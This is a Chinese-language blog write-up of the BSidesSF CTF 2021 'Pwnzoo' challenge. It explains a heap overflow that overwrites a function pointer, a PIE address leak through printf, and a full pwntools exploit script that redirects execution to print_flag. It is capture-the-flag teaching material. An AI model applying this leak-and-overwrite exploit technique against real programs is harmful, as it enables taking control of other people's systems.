BSidesSF CTF 2021 Pwnzoo

检查一下开启的保护机制:

 

用ida分析一下程序:

主函数是这样的:

 

走到construct_animal()函数:

申请了一个堆块,用以存储动物结构体,看起来这个堆块上有函数指针

并且会把anmial->name初始化为0x24个空格,下面change_name时会用到

 

main函数调用完construct_animal()后,会调用change_name()函数:

change_name是向堆块上写数据,并且可以输入strlen(animal->name)+1个数据,这是一个堆溢出

然后main函数会一直循环menu()函数,menu提供change_name,speak,exit的功能

 

现在用gd调试一下,看看这个animal结构体:

那么animal结构体的定义应该是这样的:

struct animal{

  int species;

  char name[0x24];

  void (* speak) (animal_t * a);

};

 那么就利用堆溢出,改写这个函数指针

程序正好提供了print_flag函数:

面临的问题就是程序开启了pie,我们不知道print_flag()函数地址

speak_dog函数会调用printf("%s",animal->name)把堆块里的数据打印出来,

如果没有遇到\x00,会连带把animal->speak一块打印出来,这样就拿到了pie

 

利用脚本如下:

#coding:utf-8

from pwn import *
context.log_level="debug"
#sh=gdb.debug("./pwnzoo")
#sh=process("./pwnzoo")
sh=remote("pwnzoo-7fb58ad8.challenges.bsidessf.net",1234)
elf=ELF("./pwnzoo")

def edit(name):
    sh.sendlineafter("Menu","2")
    sh.sendlineafter("name",name)
    
sh.sendlineafter("dog?",'d')
sh.sendlineafter("name",'a'*0x23+'z')

sh.sendlineafter("Menu","1")
sh.recvuntil("aaz")
pie=u64(sh.recv(6)+b"\x00\x00")-0x11e5
info(hex(pie))

for i in range(6):edit(b'a'*0x24+p64(pie+elf.sym['print_flag'])[:i+1]) 
sh.sendlineafter(
"Menu","1")

#pwnlib.gdb.attach(sh)
sh.interactive()

 

posted @ 2021-03-09 08:17  田埂  阅读(90)  评论(0编辑  收藏  举报